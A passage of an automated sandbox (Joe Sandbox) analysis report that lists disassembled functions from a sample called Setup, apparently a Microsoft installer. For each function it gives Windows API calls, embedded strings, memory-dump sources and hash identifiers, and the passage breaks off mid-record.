                                                              • Opcode Fuzzy Hash: 458c84cb49e57d0d98cd48f3bf810be8b52667a48375f4fd41be00df8ed93d14
                                                              • Instruction Fuzzy Hash: D5019671601068ABDB10DBA5DC4CDDE77BCEB8A314F500165E928D3680DB34DF85CAE5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A7BEC Relevance: 7.5, APIs: 5, Instructions: 37fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNEL32(?,00000000,?,6C490FC5,9F1A557E), ref: 6C4A7BFB
                                                              • DeleteFileW.KERNEL32(?,00000000,?,6C490FC5,9F1A557E), ref: 6C4A7C0E
                                                              • DeleteFileW.KERNEL32(00000000,00000000,?,6C490FC5,9F1A557E), ref: 6C4A7C1E
                                                              • GetLastError.KERNEL32(?,6C490FC5,9F1A557E), ref: 6C4A7C28
                                                              • MoveFileW.KERNEL32(?,00000000), ref: 6C4A7C41
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$ChangeCloseErrorFindLastMoveNotification
                                                              • String ID:
                                                              • API String ID: 441735897-0
                                                              • Opcode ID: 23ecf16fc0e3269a42257f7e262d610df6a9882bbd0283cb409b78dd1e38c296
                                                              • Instruction ID: 4f7e466caddc0fe75ffd356d582bf0739bd9e6aad6135cf4a975e8f0ab59a7a5
                                                              • Opcode Fuzzy Hash: 23ecf16fc0e3269a42257f7e262d610df6a9882bbd0283cb409b78dd1e38c296
                                                              • Instruction Fuzzy Hash: 42F09C3160E1147BDB31EFA5CC04F8A36B89F2339BB010529FA19D5A0CD730C59286D1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C922E48 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C922E4F
                                                                • Part of subcall function 6C949653: _free.LIBCMT ref: 6C949698
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_free
                                                              • String ID: evaluated to false$ evaluated to true$BlockIf
                                                              • API String ID: 2248394366-2909538125
                                                              • Opcode ID: 5ea2a185b0d4e898a7e79e9c5ca463e7139b6158166b51a9232900d64564063d
                                                              • Instruction ID: 683fdbf7a4a0a7a61bde655fb15044bbec40cab1639e7d053d0e0ed50c19426f
                                                              • Opcode Fuzzy Hash: 5ea2a185b0d4e898a7e79e9c5ca463e7139b6158166b51a9232900d64564063d
                                                              • Instruction Fuzzy Hash: 75A1A370900209DFCF10CFA8C984ADEBBB5FF69318F144599E454ABB91C735EA0ACB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C944513 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9445A2
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C918129: SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,6C91AA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C918149
                                                              Strings
                                                              • .htm, xrefs: 6C944763
                                                              • Cannot get valid temp folder, xrefs: 6C94456D
                                                              • Cannot create file or delete file in Temp directory , xrefs: 6C9445C5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8FilePointerThrow
                                                              • String ID: .htm$Cannot create file or delete file in Temp directory $Cannot get valid temp folder
                                                              • API String ID: 1975055723-2150540039
                                                              • Opcode ID: 1d5969c5b4ff67202e95eb496dc5ea7322c3a182da00ac6090172c66be00167d
                                                              • Instruction ID: e7718a9bafc7b8a14e604d86bc8e7434094bcf47659c65abbf0c9492811933bf
                                                              • Opcode Fuzzy Hash: 1d5969c5b4ff67202e95eb496dc5ea7322c3a182da00ac6090172c66be00167d
                                                              • Instruction Fuzzy Hash: 9FA18C711083459FD704DFA8C840B8EBBE8BFA5328F044A1EF4A4D7B90DB74D5098B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C932E7C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C932E83
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C932DBC: __EH_prolog3.LIBCMT ref: 6C932DC3
                                                                • Part of subcall function 6C9491D4: __EH_prolog3.LIBCMT ref: 6C9491DB
                                                                • Part of subcall function 6C9491D4: __recalloc.LIBCMT ref: 6C94921D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID: No ProcessBlock element$ProcessBlock added$ProcessBlocks
                                                              • API String ID: 1900422986-3251087430
                                                              • Opcode ID: 1dd33608ec10c6e73cdab556a61aea9a4b6c4f4ce76bb1077538d4df4efa88b4
                                                              • Instruction ID: 42a9461684e2ca6dad39c4862c7b9c5e46385a6641a2f2d7d8c42c58630fdb22
                                                              • Opcode Fuzzy Hash: 1dd33608ec10c6e73cdab556a61aea9a4b6c4f4ce76bb1077538d4df4efa88b4
                                                              • Instruction Fuzzy Hash: F3716270A00249DFDF00CFA8C984AAEBBB5BF59308F144469E515EB791C735DE45CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9331C4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9331CB
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C933104: __EH_prolog3.LIBCMT ref: 6C93310B
                                                                • Part of subcall function 6C9491D4: __EH_prolog3.LIBCMT ref: 6C9491DB
                                                                • Part of subcall function 6C9491D4: __recalloc.LIBCMT ref: 6C94921D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID: No ServiceBlock element$ServiceBlock added$ServiceBlocks
                                                              • API String ID: 1900422986-3373415214
                                                              • Opcode ID: 18442fa0bc6cfe61d621d6cc550c2b7c6e71a0184a8a83d1bc09645ba811a132
                                                              • Instruction ID: 1039bfb125b7db6e1ad702bf40a282fafc62f5065e40d375da76749c516acc15
                                                              • Opcode Fuzzy Hash: 18442fa0bc6cfe61d621d6cc550c2b7c6e71a0184a8a83d1bc09645ba811a132
                                                              • Instruction Fuzzy Hash: D9714070A00249DFDF00CFA8C984AAEBBB5BF59308F248569E515EB791CB30DE45CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9472E4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C9472EB
                                                                • Part of subcall function 6C9143C4: __EH_prolog3.LIBCMT ref: 6C9143CB
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948ED0: __EH_prolog3.LIBCMT ref: 6C948ED7
                                                                • Part of subcall function 6C948ED0: PathFindExtensionW.SHLWAPI(?,00000004,6C947362,?,?,?,00000000,?,?), ref: 6C948F01
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C943B2B: __EH_prolog3.LIBCMT ref: 6C943B32
                                                                • Part of subcall function 6C943B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C94EC79,?,?), ref: 6C943BC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CriticalExtensionFindH_prolog3_catchInitializePathSection_malloc
                                                              • String ID: .htm$.html$.txt
                                                              • API String ID: 2678321574-1806469533
                                                              • Opcode ID: 20952834c6afaf6bd08c881262e62e114e964cbfc2392a6a52f429375e25e6b2
                                                              • Instruction ID: 15b0bddd268d89b48874d424d6e4d577fb8cb63a342c50634bc0611c200ab747
                                                              • Opcode Fuzzy Hash: 20952834c6afaf6bd08c881262e62e114e964cbfc2392a6a52f429375e25e6b2
                                                              • Instruction Fuzzy Hash: 3351A130904249DEEF10DBA9C904BEDBBE9AF25318F108556E454EBBC1D774DA08CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C491003 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C4A7ACF: GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 6C4A7AFC
                                                                • Part of subcall function 6C490ECA: SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 6C490F06
                                                              • PathFileExistsW.SHLWAPI(?,?,9F1A557E), ref: 6C491126
                                                              • ShellExecuteW.SHELL32(00000001,print,?,00000000,00000000,00000000), ref: 6C49116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Path$ExecuteExistsFileH_prolog3MessageSendShellTemp
                                                              • String ID: %s\BlockersInfo%d.rtf$print
                                                              • API String ID: 2742019059-575943144
                                                              • Opcode ID: 7146ff5e2f000193fea63cbf9024d5f2294b80299320bd3e55e24d955a7d603c
                                                              • Instruction ID: 9b35a1e7cb952faae61c709a2eddaf67aa7b650aceb3f19b2d6e46adb2258ed2
                                                              • Opcode Fuzzy Hash: 7146ff5e2f000193fea63cbf9024d5f2294b80299320bd3e55e24d955a7d603c
                                                              • Instruction Fuzzy Hash: 61414E725082459FD710DFA8C844E9FBBE8FF89718F040A2DF498A7750D730D91A8BA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94A622 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last
                                                              • String ID: DW\DW20.exe$Failed to record SetupFlags
                                                              • API String ID: 685212868-3543485478
                                                              • Opcode ID: 0d4f84211ff0e506865e46b9836dff087400a0136ca6f4e889873cf5dda03241
                                                              • Instruction ID: afc8fc815f6aae28807af0b9ca01d5e5d7974773efcfe05fcdf531b204b53958
                                                              • Opcode Fuzzy Hash: 0d4f84211ff0e506865e46b9836dff087400a0136ca6f4e889873cf5dda03241
                                                              • Instruction Fuzzy Hash: 9B41AF71900209DFDB14DBB8C845ADEBBB9BF66318F148656E411EBBC1CB34DA09C7A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C623E29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C623E94
                                                              • RegQueryValueExW.KERNEL32(00000000,00000002,00000000,?,?,00000004), ref: 6C623EB0
                                                              • RegCloseKey.KERNEL32(00000000), ref: 6C623ECE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: CEIPEnable
                                                              • API String ID: 3677997916-1389088331
                                                              • Opcode ID: da6be7f1470f547f5543649edb506afc40f7393d6b2345e1c999d1991eb97b36
                                                              • Instruction ID: 8467cd84aa9ee7b41bb2cf39830445b119232e51f5dd7fea4e6a4802f8b8aac3
                                                              • Opcode Fuzzy Hash: da6be7f1470f547f5543649edb506afc40f7393d6b2345e1c999d1991eb97b36
                                                              • Instruction Fuzzy Hash: 98310432A44168EFCB119F45CC80F997B75EB4178DF208065E914AB8B1C37ACD849F5E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C953439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953440
                                                              • PathStripToRootW.SHLWAPI(00000000,C600000B,6C94FA6E,00000010,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C9534D8
                                                              • GetLastError.KERNEL32(?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95350D
                                                              Strings
                                                              • Failed to record SystemMemory, xrefs: 6C953527
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3LastPathRootStrip
                                                              • String ID: Failed to record SystemMemory
                                                              • API String ID: 1831876552-335854511
                                                              • Opcode ID: a2580c3664d5ab734858e7590064295a12d2296f13fb28312f48cb2851e22eea
                                                              • Instruction ID: db6989208612821102d866ffbd73b46a7a95e5c98d8bec87b9490df87fbff001
                                                              • Opcode Fuzzy Hash: a2580c3664d5ab734858e7590064295a12d2296f13fb28312f48cb2851e22eea
                                                              • Instruction Fuzzy Hash: 1131BE71A001169BDF04DFB5C8899EEBB79BF26328F500614E524E7BD0CB34D919CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C947C9E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C947CA5
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91391D: __EH_prolog3.LIBCMT ref: 6C913924
                                                                • Part of subcall function 6C91395E: __EH_prolog3.LIBCMT ref: 6C913965
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Package Name = %s$Package Version = %s$Package details
                                                              • API String ID: 431132790-2412997842
                                                              • Opcode ID: 29f0d547a165a4af1aa7fabb7b58f28e9a273f36fe0d08a24d65d62e6e95395a
                                                              • Instruction ID: 77f48b1913cc5d3ec927287f580152fdba0a32436a44d53dbdcf6516ee02d5d6
                                                              • Opcode Fuzzy Hash: 29f0d547a165a4af1aa7fabb7b58f28e9a273f36fe0d08a24d65d62e6e95395a
                                                              • Instruction Fuzzy Hash: 1831887190014AEFDF00CBA8C948BEDBBB5BF22308F144545E114BBB91C771EA19CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91712B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C917132
                                                              • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,00000010), ref: 6C917191
                                                              • #195.MSI(00000010,00000000,00000104,00000000,00000000,00000104,00000010,MSI.dll), ref: 6C917200
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: #195FolderH_prolog3Path
                                                              • String ID: MSI.dll
                                                              • API String ID: 2462876523-3845536143
                                                              • Opcode ID: ec921b735ca139facfb3a41e0bdb8ff504c8ee32c632c050979ca54666e5d6f4
                                                              • Instruction ID: 990c8dec311bbc5a0b5f794653255430c5e97262405e204119f83c80fcb64ae2
                                                              • Opcode Fuzzy Hash: ec921b735ca139facfb3a41e0bdb8ff504c8ee32c632c050979ca54666e5d6f4
                                                              • Instruction Fuzzy Hash: 8A316E70A102099BDF04DFA4C888AFEBBB5BF65318F144559E410ABB90C774DA098BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94F821 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C9476A7: __EH_prolog3.LIBCMT ref: 6C9476AE
                                                                • Part of subcall function 6C9476A7: GetModuleHandleW.KERNEL32(kernel32.dll,00000020,6C94F845,?), ref: 6C947748
                                                                • Part of subcall function 6C9476A7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C947758
                                                                • Part of subcall function 6C9476A7: SetThreadStackGuarantee.KERNEL32(00020000), ref: 6C94776D
                                                                • Part of subcall function 6C9476A7: SetUnhandledExceptionFilter.KERNEL32(6C95416A), ref: 6C947774
                                                                • Part of subcall function 6C9476A7: GetCommandLineW.KERNEL32 ref: 6C94777A
                                                              • _memset.LIBCMT ref: 6C94F85B
                                                              • GetEnvironmentVariableW.KERNEL32(DebugIronMan,?,000000FF,?,?,?), ref: 6C94F874
                                                              • DebugBreak.KERNEL32(?,?,?), ref: 6C94F8B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressBreakCommandDebugEnvironmentExceptionFilterGuaranteeH_prolog3HandleLineModuleProcStackThreadUnhandledVariable_memset
                                                              • String ID: DebugIronMan
                                                              • API String ID: 12115070-628588297
                                                              • Opcode ID: 399fc7bb1a26b66548c0316d7cf1b5db04410099c683178e6927ad3daaad63d0
                                                              • Instruction ID: ca356fa1096020af926bdfc19b19624941e9f7ebb8116fd5ccda3040612f5947
                                                              • Opcode Fuzzy Hash: 399fc7bb1a26b66548c0316d7cf1b5db04410099c683178e6927ad3daaad63d0
                                                              • Instruction Fuzzy Hash: 8E1108B1B0020BAADB10AF758905A9773FCEF1471CF4486A4E426DBB41F730D644C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C622815 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTokenInformation.KERNELBASE(?,/3bl,00000000,00000000,00000000,00000000,00000000,?,?,6C6236C7,?,00000001), ref: 6C622835
                                                              • GetLastError.KERNEL32(?,?,6C6236C7,?,00000001,?,?,?,?,6C62332F,?), ref: 6C62283B
                                                                • Part of subcall function 6C621967: malloc.MSVCRT(?,6C640554), ref: 6C621979
                                                              • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,?,?,6C6236C7,?,00000001,?,?,?,?,6C62332F,?), ref: 6C622863
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: InformationToken$ErrorLastmalloc
                                                              • String ID: /3bl
                                                              • API String ID: 3066823155-3975618539
                                                              • Opcode ID: 9f254fa508449c3a7e9bf791a781ef3353f54280b60534064f123a619bd6b6b8
                                                              • Instruction ID: b9c3b29799725b4f33141c52b42913c9b6c010735daff0c3283acb934e439f6f
                                                              • Opcode Fuzzy Hash: 9f254fa508449c3a7e9bf791a781ef3353f54280b60534064f123a619bd6b6b8
